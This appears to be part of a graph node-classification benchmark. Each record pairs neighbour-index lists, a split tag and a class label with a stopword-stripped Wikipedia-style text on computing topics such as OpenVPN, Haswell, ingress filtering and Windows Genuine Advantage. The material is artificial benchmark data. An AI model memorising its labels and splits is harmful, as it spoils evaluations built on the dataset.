[ 7170, 7173, 9739, 10767, 7699, 5655, 10781, 5663, 10786, 8231, 10796, 3630, 4144, 7218, 11314, 11322, 6716, 2623, 6207, 2113, 7234, 7235, 11333, 3142, 3148, 2638, 3159, 1122, 10851, 7269, 1126, 1638, 3175, 9320, 11374, 8815, 7281, 630, 8822...
Test
2,225
9
Bigloo:bigloo bigloo programming language dialect language lisp implementation language scheme developed french research institute french institute research computer science automation inria oriented toward providing tools effective diverse code generation match performance hand-written c c++ bigloo system contains scheme compiler generate c code java virtual machine jvm .net framework .net bytecode lisp dialects contains interpreter also termed read-eval-print loop repl free open-source software run-time system libraries released gnu lesser general public license lgpl compiler programming tools released gnu general public license gpl bigloo scheme implementation devoted one goal enabling scheme based programming style c ++ usually required hop web application engine roadsend php written bigloo bigloo-lib project contains modules
[ 10752, 11269, 2056, 2062, 9231, 7184, 2577, 9749, 8728, 4633, 4122, 8226, 3119, 2105, 3132, 6717, 8258, 8771, 3142, 8262, 1613, 9299, 10841, 3675, 7267, 2660, 8293, 2666, 5751, 7805, 9345, 1159, 9865, 6797, 9877, 5803, 7867, 4799, 7880, 8...
Test
2,226
3
Hardware_register:hardware register digital electronics especially computing hardware registers circuits typically composed flip flops often many characteristics similar memory distinguishing characteristic however also special hardware-related functions beyond ordinary memory depending point view hardware registers like memory additional hardware-related functions memory circuits like hardware registers store data hardware registers used interface software peripherals software writes send information device reads get information device hardware devices also include registers visible software internal use depending complexity modern hardware devices many registers standard integrated circuits typically document externally-exposed registers part electronic component datasheet typical uses hardware registers include reading hardware register peripheral units — computer hardware outside cpu — involves accessing memory-mapped i/o address port-mapped i/o address load store instruction issued processor hardware registers addressed words sometimes use bits word read written register commercial design tools simplify automate memory-mapped register specification code generation hardware firmware hardware verification testing documentation registers read/write read-only write-only write-only registers generally avoided suitable registers cause transient action written store persistent data read 'reset peripheral register may option designs afford gates relatively large logic circuit signal routing needed register data readback atari 2600 games console tia chip however write-only registers make debugging difficult lead read-modify-write problem read/write registers preferred pcs write-only registers made difficult advanced configuration power interface acpi determine device state entering sleep mode order restore state exiting sleep mode hardware registers inside central processing unit cpu called processor registers strobe registers interface normal hardware registers instead storing data trigger action time written rare cases read means signaling registers normally measured number bits hold example 8-bit register 32-bit register designers implement registers wide variety ways including addition programmer-visible registers read written software many chips internal microarchitectural registers used state machines pipelining example registered memory spirit ip-xact dita sidsc xml define standard xml formats memory-mapped registers
[ 7173, 9739, 7699, 5655, 6167, 10781, 8231, 3630, 9777, 7218, 2623, 2113, 7234, 9794, 3142, 2638, 3159, 7772, 1122, 3175, 8301, 8815, 630, 8822, 7313, 9371, 6815, 8352, 5793, 6818, 6821, 7852, 9391, 7858, 9911, 8890, 4286, 2241, 2243, 3788...
None
2,227
4
SquidGuard:squidguard squidguard url redirector software used content control websites users access written plug-in squid uses blacklists define sites access redirected squidguard must installed unix linux computer server computer software filtering extends computers organization including windows macintosh computers originally developed pål baltzersen lars erik håland implemented extended lars erik håland 1990s tele danmark internordia version 1.4 current stable version released 2009 version 1.5 development 2010 new features version 1.4 included optional authentication via mysql database squidguard free software licensed gnu general public license gpl version 2 included many linux distributions including debian opensuse ubuntu url filtering capabilities squidguard depend largely quality blacklists used several options available free lists found shallalist.de université toulouse 1 capitole commercial lists found squidblacklist.org
[ 6797, 7022, 7983, 5492, 5012, 823, 5433, 5407 ]
Train
2,228
4
OpenVPN:openvpn openvpn open-source commercial software implements virtual private network vpn techniques create secure point-to-point site-to-site connections routed bridged configurations remote access facilities uses custom security protocol utilizes ssl/tls key exchange capable traversing network address translators nats firewalls written james yonan published gnu general public license gpl openvpn allows peers authenticate using pre-shared secret keys certificates username/password used multiclient-server configuration allows server release authentication certificate every client using signatures certificate authority uses openssl encryption library extensively well tls protocol contains many security control features openvpn ported embedded several systems example dd-wrt openvpn server function softether vpn multi-protocol vpn server implementation openvpn protocol openvpn uses openssl library provide encryption data control channels lets openssl encryption authentication work allowing openvpn use ciphers available openssl package also use hmac packet authentication feature add additional layer security connection referred hmac firewall creator also use hardware acceleration get better encryption performance support mbed tls available starting version 2.3 openvpn several ways authenticate peers openvpn offers pre-shared keys certificate-based username/password-based authentication preshared secret key easiest certificate-based robust feature-rich version 2.0 username/password authentications enabled without certificates however make use username/password authentications openvpn depends third-party modules openvpn run user datagram protocol udp transmission control protocol tcp transports multiplexing created ssl tunnels single tcp/udp port rfc 3948 udp 2.3.x series openvpn fully supports ipv6 protocol virtual network inside tunnel openvpn applications also establish connections via ipv6 ability work proxy servers including http good working network address translation nat getting firewalls server configuration ability push certain network configuration options clients include ip addresses routing commands connection options openvpn offers two types interfaces networking via universal tun/tap driver create either based ip tunnel tun based ethernet tap carry type ethernet traffic openvpn optionally use lzo compression library compress data stream port 1194 official iana assigned port number openvpn newer versions program default port feature 2.0 version allows one process manage several simultaneous tunnels opposed original one tunnel per process restriction 1.x series openvpn use common network protocols tcp udp makes desirable alternative ipsec situations isp may block specific vpn protocols order force users subscribe higher-priced business grade service tier openvpn uses transmission control protocol tcp transports establish tunnel performance acceptable long sufficient excess bandwidth un-tunneled network link guarantee tunneled tcp timers expire becomes untrue performance falls dramatically known tcp meltdown problem openvpn offers various internal security features 256-bit encryption openssl library although service providers may offer lower rates effectively providing fastest vpn available consumers runs userspace instead requiring ip stack therefore kernel operation openvpn ability drop root privileges use mlockall prevent swapping sensitive data disk enter chroot jail initialization apply selinux context initialization openvpn runs custom security protocol based ssl tls rather support ike ipsec l2tp pptp openvpn offers support smart cards via pkcs 11-based cryptographic tokens openvpn extended third-party plug-ins scripts called defined entry points purpose often extend openvpn advanced logging enhanced authentication username passwords dynamic firewall updates radius integration plug-ins dynamically loadable modules usually written c scripts interface execute scripts binaries available openvpn openvpn source code examples plug-ins including pam authentication plug-in several third-party plug-ins also exist authenticate ldap sql databases sqlite mysql available solaris linux openbsd freebsd netbsd qnx macos windows xp later openvpn available mobile phone operating systems os including maemo windows mobile 6.5 ios 3gs+ devices jailbroken ios 3.1.2+ devices android 4.0+ devices android devices cyanogenmod aftermarket firmware flashed correct kernel module installed compatible mobile phone oses including palm os web-based vpn shown web page citrix terminal services web access program installed independently configured editing text files manually rather gui-based wizard openvpn compatible vpn clients use ipsec l2tp pptp protocols entire package consists one binary client server connections optional configuration file one key files depending authentication method used openvpn integrated several router firmware packages allowing users run openvpn client server mode network routers router running openvpn client mode example allows device network access vpn without needing capability install openvpn notable firmware packages openvpn integration include openvpn implemented manufacturer router firmware d-link dsr-250 mikrotik routers mikrotik implementation support udp protocol lzo compression limits transfer speeds attainable mikrotik said 2010 would continue developing openvpn favor secure socket tunneling protocol sstp openvpn integrated softether vpn open-source multi-protocol vpn server allow users connect vpn server existing openvpn clients openvpn also integrated vyos open-source routing os forked vyatta software router openvpn available two versions
[ 2050, 517, 3590, 10254, 9744, 9745, 8211, 9764, 1580, 3629, 569, 2111, 9281, 8265, 1101, 2136, 8283, 2143, 10851, 9318, 5749, 6779, 5254, 10889, 4746, 8331, 9868, 1683, 11413, 8344, 3742, 11430, 4268, 10924, 7857, 10417, 7859, 3770, 3777, ...
Test
2,229
4
Mayfield's_paradox:mayfield paradox mayfield paradox states keep everyone information system requires infinite amount money get everyone onto information system also requires infinite money costs extremes relatively low paradox depicted u-curve cost system vertical axis percentage humanity access system horizontal axis acceptance paradox information security community immediate consistent professional experiences group mayfield paradox points point curve additional security becomes unrealistically expensive conversely point curve becomes unrealistically expensive add additional users based paradox menz brothers developed menz theorems information physical security theorems present two formulas covering access security information systems physical facilities used help determine allocation resources response levels
[ 5373 ]
Test
2,230
6
Aufs:aufs aufs short advanced multi-layered unification filesystem implements union mount linux file systems name originally stood anotherunionfs version 2 developed junjiro okajima 2006 aufs complete rewrite earlier unionfs aimed improve reliability performance also introduced new concepts like writable branch balancing improvements – implemented unionfs 2.x branch aufs rejected merging mainline linux code criticized dense unreadable uncommented instead overlayfs merged linux kernel several attempts merge aufs mainline kernel author given aufs included debian jessie ubuntu 16.04 box debian stretch include aufs anymore provides package aufs-dkms auto-compiles aufs kernel module using dell dkms docker originally used aufs container filesystem layers still available one supported storage backends several linux distributions chosen aufs replacement unionfs including
[ 5120, 2564, 6669, 3598, 10257, 9236, 6677, 5142, 8214, 10774, 3611, 9249, 9762, 5158, 7225, 11323, 8772, 1109, 5721, 4708, 9836, 7789, 9333, 6263, 9335, 1150, 9343, 8837, 7818, 654, 2193, 2194, 2197, 2199, 11419, 6309, 1190, 5286, 10405, ...
Test
2,231
2
CAINE_Linux:caine linux caine linux stands computer aided investigative environment italian linux live distribution started digital forensics project caine professional open source forensic platform integrates software tools modules along powerful scripts graphical interface environment operational environment designed intent provide forensic professional tools required perform digital forensic investigate process preservation collection examination analysis caine live linux distribution booted removable media flash drive optical disk run memory also installed onto physical virtual system live mode caine operate data storage objects without boot supporting operating system latest version 9.0 boot uefi/uefi+secure legacy bios allowing caine used information systems boot older operating systems e.g windows nt newer platforms linux windows 10 caine based ubuntu 16.04 64-bit using linux kernel 4.4.0-97 caine system requirements run live disc similar ubuntu 16.04 2 ghz dual core processor better 2 gb system memory run physical system virtual machine environment vmware workstation caine linux distribution numerous software applications scripts libraries used graphical command line environment perform forensic tasks caine perform data analysis data objects created microsoft windows linux unix systems one key forensic features version 9.0 sets block devices default read-only mode write-blocking critical methodology ensure disks subject writing operations operating system forensic tools ensures attached data objects modified would negatively impact digital forensic preservation caine provides software tools support database memory forensic network analysis file system image analysis ntfs fat/exfat ext2 ext3 hfs iso 9660 possible via command line graphic desktop examination linux microsoft windows unix platforms built-in caine import disk images raw dd expert witness/advanced file format may obtained using tools included caine another platform encase forensic tool kit tools included caine linux distribution include
[ 9762, 5284, 645, 7525, 842, 1515, 11182, 8976, 5492, 2901, 2494 ]
None
2,232
2
Apple_Configurator:apple configurator apple configurator application developed apple inc. available free download mac app store first launched march 2012 replaces iphone configuration utility application allows mass-configuration ios devices iphone ipad business educational organizations provides remote management administrator help set maintain standard configuration software across number devices
[ 9732, 4615, 5647, 1042, 6700, 4657, 1074, 576, 9802, 5713, 3670, 4184, 2141, 4702, 2149, 8303, 6771, 2676, 9343, 3719, 10888, 11402, 8852, 1686, 7318, 3228, 2207, 1699, 5292, 8877, 1710, 3766, 9912, 9406, 1729, 6849, 713, 9418, 3790, 9430...
Test
2,233
9
GNU_cflow:gnu cflow gnu cflow flow graph generator part gnu project reads collection c source files generates c flow graph external references uses sources n't need run program initially implementation unix utility cflow cflow unix command generating c-language flowgraph besides gnu implementations cflow like one tru64 unix
[ 2050, 2180, 11654, 4493, 1939, 802, 3618, 7983, 1459, 5555, 823, 9148, 10687, 10822, 5703, 5833, 8147, 3674, 2010, 10464, 6369, 9579, 8304, 1394, 8436, 2045 ]
Test
2,234
2
Infinispan:infinispan infinispan distributed cache key-value nosql data store software developed red hat java applications embed library use service wildfly non-java applications use remote service tcp/ip infinispan successor jboss cache project announced 2009 typical use-cases infinispan include infinispan also used academia research framework distributed execution storage
[ 2339, 6277, 1385, 4811, 5677, 10734, 9455, 5872, 11343, 2804, 2901, 9144, 5047, 5560, 3518 ]
Test
2,235
2
Tizen_Association:tizen association tizen association formerly limo linux mobile foundation non-profit technology consortium organization dedicated creating tizen first truly open hardware-independent linux-based mobile operating system smartphone mobile devices mission limo foundation create open linux-based software platform use industry produce mobile devices balanced transparent contribution process enabling ecosystem differentiated products applications services governance open transparent leadership decision making shared founding members motorola nec ntt docomo panasonic mobile communications samsung electronics vodafone work result limo platform work integrated mobile phone products nec panasonic samsung later combined tizen platform members tizen association phones using limo include end september 2011 announced linux foundation meego totally replaced tizen mobile operating system project 2012 tizen new free open source linux-based operating-system released first quarter 2012 intel samsung collaboration limo foundation assisting meego developers pointed lead development new software platform using third-party developer frameworks primarily built html5 web standards october 2012 limo website traffic redirected tizen.org
[ 5824, 4225, 8355, 6276, 11391, 4011, 7857, 5938, 2259, 9237, 823, 3162, 1083, 10303 ]
Test
2,236
2
Singularity_(software):singularity software singularity free cross-platform open-source computer program performs operating-system-level virtualization also known containerization one main uses singularity bring containers reproducibility scientific computing high-performance computing hpc world need reproducibility requires ability use containers move applications system system using singularity containers developers work reproducible environments choosing design complete environments easily copied executed platforms singularity began open-source project 2015 team researchers lawrence berkeley national laboratory led gregory kurtzer developed initial version released bsd license end 2016 many developers different research facilities joined forces team lawrence berkeley national laboratory development singularity singularity quickly attracted attention computing-heavy scientific institutions worldwide two years row 2016 2017 singularity recognized hpcwire editors one five new technologies watch 2017 singularity also first place category ″best hpc programming tool technology″ 2018 based data entered voluntary basis public registry singularity user base estimated greater 25,000 installations includes users academic institutions ohio state university michigan state university well top hpc centers like texas advanced computing center san diego supercomputer center oak ridge national laboratory singularity able support natively high-performance interconnects infiniband intel omni-path architecture opa similar support infiniband intel opa devices singularity support pcie-attached device within compute node graphic accelerators singularity also native support open mpi library utilizing hybrid mpi container approach openmpi exists inside outside container features make singularity increasingly useful areas machine learning deep learning data-intensive workloads applications benefit high bandwidth low latency characteristics technologies hpc systems traditionally already resource management job scheduling systems place container runtime environments must integrated existing system resource manager using enterprise container solutions like docker hpc systems would require modifications software singularity seamlessly integrates many resource managers including
[ 3969, 6150, 2058, 4238, 8466, 2710, 1435, 1823, 546, 2212, 6438, 295, 10537, 7983, 2864, 7349, 7733, 823, 9525, 5049, 9655, 318, 5697, 5702, 1480, 1101, 8909, 7248, 1362, 7507, 8147, 2645, 10971, 2910, 10851, 9320, 1513, 5356, 5612, 3055,...
None
2,237
3
Haswell_(microarchitecture):haswell microarchitecture haswell codename processor microarchitecture developed intel fourth-generation core successor ivy bridge microarchitecture intel officially announced cpus based microarchitecture june 4 2013 computex taipei 2013 working haswell chip demonstrated 2011 intel developer forum haswell uses 22 nm process intel also introduced low-power processors designed convertible hybrid ultrabooks designated suffix haswell cpus used conjunction intel 8 series chipsets intel 9 series chipsets intel c220 series chipsets haswell architecture specifically designed optimize power savings performance benefits move finfet non-planar 3d transistors improved 22 nm process node haswell launched three major forms compared ivy bridge around middle 2014 intel released refresh haswell simply titled haswell refresh compared original haswell cpus lineup haswell refresh cpus offer modest increase clock frequencies usually 100 mhz haswell refresh cpus supported intel 9 series chipsets z97 h97 codenamed wildcat point motherboards 8 series chipsets codenamed lynx point usually require bios update support haswell refresh cpus cpus codenamed devil canyon covering i5 i7 k-series skus employ new improved thermal interface material tim called next-generation polymer thermal interface material ngptim improved tim reduces cpu operating temperatures improves overclocking potential something problematic since introduction ivy bridge changes devil canyon cpus include tdp increase 88 w additional decoupling capacitors help smooth outputs fully integrated voltage regulator fivr support vt-d previously limited non-k-series skus tsx another feature brought non-k-series skus august 2014 microcode update disabled tsx due bug discovered implementation following table lists available desktop processors sku suffixes denote first digit model number designates largest supported multi-socket configuration thus e5-26xx v3 models support dual-socket configurations e7-48xx v3 e7-88xx v3 models support quad- eight-socket configurations respectively also e5-16xx/26xx v3 e7-48xx/88xx v3 models integrated gpu lists launched server processors split haswell e3-12xx v3 e5-16xx/26xx v3 e7-48xx/88xx v3 models sku suffixes denote following table lists available mobile processors sku suffixes denote
[ 3586, 7173, 4108, 9741, 5649, 2088, 2638, 597, 4695, 1119, 7783, 4204, 8820, 630, 4217, 8325, 7313, 8851, 6804, 8855, 9369, 9391, 4276, 5309, 6339, 9932, 5844, 1260, 5356, 5871, 1776, 9970, 3317, 5883, 5380, 11524, 5386, 6926, 4886, 3352,...
None
2,238
4
Sanctum_(company):sanctum company sanctum santa clara california-based information technology company focused application security sanctum credited inventing application security space mid-'90s firewall appshield scanner appscan foresaw need better application-layer security web environments 2003 sanctum merged watchfire company subsequently acquired ibm sanctum founded 1997 perfecto technologies eran reshef gili raanan company released first product appshield summer 1999 company done extensive research application security applying formal methods real life software collaboration turing award winner professor amir penueli early research 1996 1997 led invention parallel teams captcha technology application us patent captcha 2000 company renamed sanctum company backed investors sequoia capital intel capital goldman sachs dlj walden mofet appshield product first product inspect incoming hypertext transfer protocol requests block malicious attacks based dynamic policy composed analyzing outgoing html pages later june 2000 company introduced appscan world first web security vulnerability assessment solution among first clients appscan yahoo bank america
[ 4800, 5636, 3941, 2118, 519, 8998, 331, 2705, 3323, 5404, 4797, 8735 ]
Test
2,239
2
Conectiva:conectiva conectiva company founded august 28 1995 curitiba paraná brazil group friends among arnaldo carvalho de melo pioneer distribution linux open source software brazilian portuguese spanish english latin america besides customized linux distribution latin american market conectiva developed series products additional services directed meet market demand open source tools including books manuals additional software like linux tools embedded systems oem programs applications port training kits revista linux linux magazine addition company provided consulting services training technical support latin america service centers certified partners conectiva also provided development customization professional services worldwide basis team open source software engineers conectiva development team expertise amongst others following areas linux kernel development high availability device drivers xfree86 network protocols firewalling clustering performance analysis optimisation filesystems resource management 24 january 2005 announced mandrakesoft acquired conectiva 1.79 million euro 2.3 million u.s. dollars time 7 april 2005 mandrakesoft announced decision change name parent company mandriva distribution name mandriva linux although brazilian operation would change name conectiva immediately
[ 8837, 7435, 10127, 2321, 4887, 10394, 673, 3745, 10530, 7204, 9253, 10149, 11305, 7854, 2738, 4790, 823, 439, 56, 59, 3903, 3649, 4673, 2375, 4039, 8907, 10192, 6227, 1110, 9693, 2914, 485, 3685, 9064, 4841, 6890, 7913, 7020, 9324, 7534, ...
None
2,240
4
Ingress_filtering:ingress filtering computer networking ingress filtering technique used ensure incoming packets actually networks claim originate used countermeasure various spoofing attacks attacker packets contain fake ip addresses make difficult find source attack technique often used denial-of-service attack primary target ingress filtering networks receive packets networks normally packet contain ip address computer originally sent allows devices receiving network know came allowing reply routed back amongst things except ip addresses used proxy spoofed ip address pinpoint specific user within pool users sender ip address faked 'spoofed characterising spoofing attack disguises origin packets sent example denial-of-service attack holds true proxies although different manner ip spoofing one potential solution involves implementing use intermediate internet gateways i.e. servers connecting disparate networks along path followed given packet filtering denying packet deemed illegitimate gateway processing packet might simply ignore packet completely possible might send packet back sender relaying message illegitimate packet denied host intrusion prevention systems hips one example technical engineering applications help identify prevent and/or deter unwanted unsuspected and/or suspicious events intrusions router implements ingress filtering checks source ip field ip packets receives drops packets packets n't ip address ip address block interface connected may possible end host multi-homed also sends transit network traffic ingress filtering packets coming network filtered network sending send packets originating ip address es end host stub network host router needs filter ip packets source ip private addresses rfc 1918 bogon addresses addresses network address interface network ingress filtering packet filtering technique used many internet service providers try prevent source address spoofing internet traffic thus indirectly combat various types net abuse making internet traffic traceable source network ingress filtering good neighbor policy relies cooperation isps mutual benefit best current practices network ingress filtering documented internet engineering task force bcp 38 bcp 84 defined rfc 2827 rfc 3704 respectively bcp 84 recommends upstream providers ip connectivity filter packets entering networks downstream customers discard packets source address allocated customer many possible ways implementing policy one common mechanism enable reverse path forwarding links customers indirectly apply policy based provider route filtering customers route announcements 2012 one report suggests contrary general opinion lack bcp 38 deployment 80 internet various measures already applying anti-spoofing packet filtering networks
[ 4163, 2947, 2409, 4495, 953, 9181, 4414 ]
Validation
2,241
3
Control_unit:control unit control unit cu component computer central processing unit cpu directs operation processor tells computer memory arithmetic logic unit input output devices respond instructions sent processor directs operation units providing timing control signals computer resources managed cu directs flow data cpu devices john von neumann included control unit part von neumann architecture modern computer designs control unit typically internal part cpu overall role operation unchanged since introduction control unit cu digital circuitry contained within processor coordinates sequence data movements processor many sub-units result routed data movements various digital circuits sub-units within processor produces manipulated data expected software instruction loaded earlier likely memory controls conducts data flow inside processor additionally provides several external control signals rest computer direct data instructions to/from processor external destinations i.e memory examples devices require cu cpus graphics processing units gpus cu receives external instructions commands converts sequence control signals cu applies data path implement sequence register-transfer level operations precisely control unit cu generally sizable collection complex digital circuitry interconnecting directing many execution units i.e alu data buffers registers contained within cpu cu normally first cpu unit accept externally stored computer program single instruction based cpu instruction set cu decodes individual instruction several sequential steps fetching addresses/data registers/memory managing execution i.e data sent alu i/o storing resulting data back registers/memory controls coordinates cpu inner works properly manipulate data design sequential steps based needs instruction range number steps order execution units enabled thus using program set instructions memory cu configure cpu data flows needed manipulate data correctly instructions results computer could run complete program require human intervention make hardware changes instructions done using punch cards computations stored programmed computers cus invented detailed steps cu dictate cpu interconnecting hardware control signals enable/disable cpu units selected/de-selected unit proper order execution required instruction operation produce desired manipulated data additionally cu orderly hardware coordination properly sequences control signals configures many hardware units comprising cpu directing data also moved changed stored outside cpu i.e memory according instruction objective depending type instruction entering cu order number sequential steps produced cu could vary selection configuration parts cpu hardware utilized achieve instruction objective mainly moving storing modifying data within cpu one feature efficiently uses software instructions control/select/configure computer cpu hardware via cu eventually manipulates program data significant reason modern computers flexible universal running various programs compared 1930s 1940s computers without proper cu often required rewiring hardware changing programs cu instruction decode process repeated program counter incremented next stored program address new instruction enters cu address programs end advanced forms control units manage translation instructions data containing portion several micro-instructions cu manages scheduling micro-instructions selected execution units data channeled changed according execution unit function i.e. alu contains several functions processors control unit may broken additional units instruction unit scheduling unit handle scheduling retirement unit deal results coming instruction pipeline control unit orchestrates main functions cpu carrying stored instructions software program directing flow data throughout computer based upon instructions roughly likened traffic lights systematically control flow cars containing data different locations within traffic grid cpu parks desired parking spot memory address/register car occupants data go building execution unit come back changed way get back car return another location via controlled traffic grid hardwired control units implemented use combinational logic units featuring finite number gates generate specific results based instructions used invoke responses hardwired control units generally faster microprogrammed designs design uses fixed architecture—it requires changes wiring instruction set modified changed architecture preferred reduced instruction set computers risc use simpler instruction set controller uses approach operate high speed however little flexibility complexity instruction set implement limited hardwired approach become less popular computers evolved previously control units cpus used ad-hoc logic difficult design idea microprogramming introduced maurice wilkes 1951 intermediate level execute computer program instructions microprograms organized sequence microinstructions stored special control memory algorithm microprogram control unit unlike hardwired control unit usually specified flowchart description main advantage microprogram control unit simplicity structure outputs controller organized microinstructions easily replaced
[ 7173, 9739, 2066, 7699, 5655, 10779, 10781, 6181, 8231, 3630, 6705, 7218, 2623, 2113, 7234, 2638, 3175, 8815, 6268, 3197, 7313, 6815, 5793, 6818, 6821, 7852, 9391, 2224, 2226, 7858, 9911, 8890, 4286, 2243, 1735, 9932, 5329, 10966, 731, 11...
Test
2,242
9
VisSim:vissim vissim visual block diagram program simulation dynamical systems model based design embedded systems visual language developed visual solutions westford massachusetts visual solutions acquired altair august 2015 products rebranded solidthinking embed part solidthinking model based development suite solidthinking embed develop virtual prototypes dynamic systems models built sliding blocks work area wiring together mouse embed automatically converts control diagrams c-code ready downloaded target hardware vissim solidthinking embed uses graphical data flow paradigm implement dynamic systems based differential equations version 8 adds interactive uml omg 2 compliant state chart graphs placed vissim diagrams allows modeling state based systems startup sequencing process plants serial protocol decoding vissim/solidthinking embed used control system design digital signal processing multidomain simulation design includes blocks arithmetic boolean transcendental functions well digital filters transfer functions numerical integration interactive plotting commonly modeled systems aeronautical biological/medical digital power electric motor electrical hydraulic mechanical process thermal/hvac econometric read-only version software vissim viewer available free charge provides way people licensed use vissim run vissim models program intended allow models widely shared preserving model published form viewer execute vissim model allows changes block simulation parameters illustrate different design scenarios sliders buttons may activated included model vissim/c-code add-on generates ansi c code model generates target specific code on-chip devices like pwm adc encoder gpio i2c etc useful development embedded systems behavior controller simulated c-code generated compiled run target debugging vissim supports interactive jtag linkage called hotlink allows interactive gain change plotting on-target variables vissim generated code called efficient readable making well suited development embedded systems vissim author served x3j11 ansi c committee wrote several c compilers addition co-authoring book c. deep understanding ansi c nature resulting machine code compiled key code generator efficiency vissim target small 16-bit fixed point systems like texas instruments msp430 using 740 bytes flash 64 bytes ram small closed-loop pulse-width modulation pwm actuated system well allowing high control sample rates 500 khz larger 32-bit floating point processors like texas instruments 150 mhz f28335 technique simulating system performance off-line generating code simulation known model-based development model-based development embedded systems becoming widely adopted production systems shortens development cycles hardware development way model-driven architecture shortens production cycles software development model building visual way describing situation engineering context instead writing solving system equations model building involves using visual blocks solve problem advantage using models cases problems appear difficult expressed mathematically may easier understand represented pictorially vissim uses hierarchical composition create nested block diagrams typical model would consist virtual plants composed various vissim layers combined necessary custom blocks written c fortran virtual controller added tuned give desired overall system response graphical control element sliders buttons allow control what-if analysis operator training controller tuning although vissim originally designed use control engineers used type mathematical model
[ 9345, 2691, 7301, 5129, 3980, 15, 5775, 8079, 11413, 5148, 7580, 7326, 4773, 7341, 9133, 7983, 2045, 6962, 6718, 68, 5830, 5703, 5833, 7421, 11239, 4840, 363, 7148, 5741, 1917 ]
Validation
2,243
3
Control_store:control store control store part cpu control unit stores cpu microprogram usually accessed microsequencer early types control store took form diode-arrays accessed via address decoders later implemented writable microcode stored form read-only memory called writable control store outputs generally go register prevent race condition occurring register clocked clock signal system running early control stores implemented diode-array accessed via address decoders form read-only memory tradition dates back program timing matrix mit whirlwind first described 1947 modern vlsi processors instead use matrices field-effect transistors build rom and/or pla structures used control processor well internal sequencer microcoded implementation ibm system/360 used variety techniques ccros card capacitor read-only storage model 30 tros transformer read-only storage model 40 bcros balanced capacitor read-only storage model 50 computers built using writable microcode — rather storing microcode rom hard-wired logic microcode stored ram called writable control store wcs computer sometimes called writable instruction set computer wisc many machines experimental laboratory prototypes wisc cpu/16 rtx 32p original system/360 models ibm mainframe read-only control store later system/360 system/370 successor models loaded part microprograms floppy disks dasd writable control store consisting ultra-high speed random-access read-write memory system/370 architecture included facility called initial-microprogram load iml impl could invoked console part power reset por another processor tightly coupled multiprocessor complex permitted ibm easily repair microprogramming defects field even majority control store stored rom computer vendors would often sell writable control store option allowing customers customize machine microprogram vendors e.g. ibm use wcs run microcode emulator features hardware diagnostics commercial machines used writable microcode include burroughs small systems 1970s 1980s xerox processors lisp machines xerox star workstations dec vax 8800 nautilus family symbolics l- g-machines 1980s dec pdp-10 machines stored microcode sram chips 80 bits wide x 2 kwords typically loaded power-on front-end cpu many machines offered user-programmable writable control stores option including hp 2100 dec pdp-11/60 varian data machines v-70 series minicomputers mentec m11 mentec m1 stored microcode sram chips loaded power-on another cpu data general eclipse mv/8000 eagle sram writable control store loaded power-on another cpu wcs offered several advantages including ease patching microprogram certain hardware generations faster access roms could provide user-programmable wcs allowed user optimize machine specific purposes cpu designs compile instruction set writable ram flash inside cpu rekursiv processor imsys cjip fpga reconfigurable computing several intel cpus x86 architecture family writable microcode starting pentium pro 1995 allowed bugs intel core 2 microcode intel xeon microcode fixed software rather requiring entire chip replaced fixes installed linux freebsd microsoft windows motherboard bios control store usually register outputs outputs go back sequencer determine next address go sort register prevent creation race condition designs bits also go register machine work faster execution next microinstruction delayed one cycle register known pipeline register often execution next microinstruction dependent result current microinstruction stable end current microcycle seen either way outputs control store go one big register historically used possible buy eproms register bits chip clock signal determining clock rate cycle time system primarily clocks register
[ 7173, 9739, 2066, 7699, 5655, 10779, 10781, 6181, 8231, 6184, 3630, 6705, 7218, 2623, 2113, 7234, 2638, 3175, 8815, 6268, 3197, 7313, 6815, 5793, 6818, 6821, 7852, 9391, 2224, 2226, 7858, 9911, 8890, 4286, 2241, 9932, 5329, 10966, 731, 11...
Validation
2,244
2
Windows_Genuine_Advantage:windows genuine advantage windows genuine advantage wga anti-infringement system created microsoft enforces online validation licensing several microsoft windows operating systems accessing several services windows update downloading windows components microsoft download center windows 7 wga renamed windows activation technologies wga consists two components installable component called wga notifications hooks winlogon validates windows license upon logon activex control checks validity windows license downloading certain updates microsoft download center windows update wga notifications covers windows xp later exception windows server 2003 windows xp professional x64 edition activex control checks windows 2000 professional licenses well wga also advertises latest service pack service pack 3 windows xp requires manual intervention disable previously voluntary became mandatory use services july 2005 despite name actually evaluate integrity security computer wga validation process validates present installation windows license key detected computer hardware determines software licensed microsoft accessible either stand-alone program netscape-compatible web browser plug-in activex control within internet explorer latter relevant attempt access microsoft updates via browser includes following steps activex control downloaded first validation new version available validation performed time user connects microsoft website update windows vista without service packs wga validation failure greater impact addition persistent notification disabling non-critical updates wga also disables windows aero windows defender windows readyboost user given grace period pass validation operating system disabled windows reverts reduced functionality mode behavior however removed service pack 1 windows vista favor prominent notices systems believed unlicensed user installs windows genuine advantage internet explorer add-on installed labeled windows genuine advantage early releases tool could readily disabled ie add-on management feature windows group policy added later updates causing option unavailable default still accessible policy removed july 2006 latest update blocks management means program uses either stand-alone program generate key activex control discover whether license key valid either way internet connection required windows xp wga determines user copy windows unauthorized installed seemingly legitimate media i.e. cd/dvd holographic emblem present real copies windows seems genuine microsoft supply user new cd/dvd however newer versions windows still require user purchase new copy microsoft also offers discounts people want purchase legitimate copy windows valid cd microsoft indicated continue deliver critical security updates automatic updates service well via microsoft download center systems including fail pass validation still continue receive critical security updates company made installation windows genuine advantage requirement use windows update microsoft update websites part sure customers use support resources company aware software unlicensed according microsoft legal run microsoft windows without windows genuine advantage however since non-critical windows updates presented automatic updates installation wga required installation non-critical updates available windows update microsoft download center april 25 2006 microsoft began distributing windows genuine advantage notifications critical update kb905474 windows users windows 7 kb971033 function back 2006 users copies wga believed unlicensed exposed alerts startup login use windows os stating genuine copy windows users legitimate copies supposed see alerts although anyway may 23 2006 microsoft updated program closing forms circumvention reportedly updated may 30 june 6 june 27 2006 though forms circumvention still usable latest versions roll worldwide time dates given earliest dates versions appeared actual version offered places earlier version latest release still possible opt receiving update using show option windows update site windows xp hide option right-click menu windows update control panel windows vista/7/8 addition notifications windows genuine advantage also notify users message version windows xp longer secure users xp operating system using service pack 3 provide link help users update systems new service pack version windows genuine advantage notifications released november 29 2006 changed install process inform user program also set automatically update newer versions windows genuine advantage notifications also informs users may non-genuine version windows windows version n't reported genuine however unlike previous releases started automatically delivered windows machines using four widely distributed product keys latest update version 1.9.0040.0 released march 24 2009 microsoft includes windows genuine advantage validation library several products windows validation tool windows media player 11 check validation windows software version 7 internet explorer longer requires user pass windows genuine advantage test order download install software wga validation library also included microsoft security essentials 2.0 validate windows installation whether legitimate program stop working 30 days failed validation process information used wga library check overuse license keys september 2005 microsoft filed lawsuits number companies sold unauthorized copies software based information users told copyright infringing software windows genuine advantage application may 4 2006 